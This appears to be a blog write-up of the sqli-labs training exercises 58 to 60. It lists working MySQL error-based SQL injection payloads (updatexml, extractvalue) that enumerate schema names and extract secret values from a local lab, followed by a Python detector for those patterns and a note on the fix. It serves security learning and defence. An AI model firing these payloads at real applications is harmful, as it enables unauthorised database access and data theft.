Less58, 59, 60 [Forced Error-Based Injection]

Less58: testing with a union query shows no output; both error-based injection tests succeed.
Method 1:
?id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
Method 2:
?id=1' union select extractvalue(1,concat(0x7e,(select @@version),0x7e))--+
Table names:
id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='CHALLENGES'),0x7e),1)--+
Column names:
http://127.0.0.1/sqli-labs-master/Less-58/
?id=1%27%20and%20updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='5bypzr86n6'),0x7e),1)--+
 
Field contents:
http://127.0.0.1/sqli-labs-master/Less-58/
?id=1%27%20and%20updatexml(1,concat(0x7e,(select group_concat(secret_Y15Z) from CHALLENGES.pzkk7hwo7o),0x7e),1)--+
 
Less59
No closing character
Table names:
and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='CHALLENGES'),0x7e),1)--+
Column names:
and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='bp9qzw6kvm'),0x7e),1)--+
Field contents:
and updatexml(1,concat(0x7e,(select group_concat(secret_E9SN) from CHALLENGES.bp9qzw6kvm),0x7e),1)--+
 
Less60 is the same as 58 and 59.
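
A defender-side view of the requests above, as an added example that is not part of the original post: a small Python check that flags query parameters carrying the updatexml/extractvalue error-based pattern used in these lessons. The function name, the reason labels and the sample URLs (host lab.example) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# XPath functions whose MySQL error text echoes an attacker-chosen string.
XPATH_ERR = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)
# concat() wrapping a sub-select or a server variable: the part that leaks data.
EXFIL = re.compile(r"concat\s*\(.*?(\bselect\b|@@)", re.I | re.S)
# Metadata tables queried to list table and column names.
SCHEMA = re.compile(r"information_schema\s*\.\s*(tables|columns)", re.I)

def inspect_url(url):
    """Return [(parameter, [reasons])] for suspicious query parameters."""
    findings = []
    # parse_qsl percent-decodes each value, so %27 and %20 are seen as ' and space.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        reasons = []
        if XPATH_ERR.search(value):
            reasons.append("xpath-error-function")
            if EXFIL.search(value):
                reasons.append("concat-subquery")
        if SCHEMA.search(value):
            reasons.append("schema-enumeration")
        if reasons:
            findings.append((name, reasons))
    return findings

# Constructed sample requests (not real traffic); lab.example is a placeholder host.
SAMPLES = [
    "http://lab.example/Less-58/?id=1",
    "http://lab.example/Less-58/?id=1%27%20and%20updatexml(1,concat(0x7e,"
    "(select%20user()),0x7e),1)--+",
    "http://lab.example/Less-59/?id=1%20and%20updatexml(1,concat(0x7e,"
    "(select%20group_concat(table_name)%20from%20information_schema.tables"
    "%20where%20table_schema=%27CHALLENGES%27),0x7e),1)--+",
    # Benign: mentions the function name but never calls it.
    "http://lab.example/search?q=how+to+use+updatexml+in+mysql",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(inspect_url(url) or "clean", "<-", url[:60])
```

A pattern match like this only supports detection and triage; the underlying fix is to bind `id` as a query parameter and to stop returning database error text to the client.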
posted @ 2020-12-14 15:00  峰中追风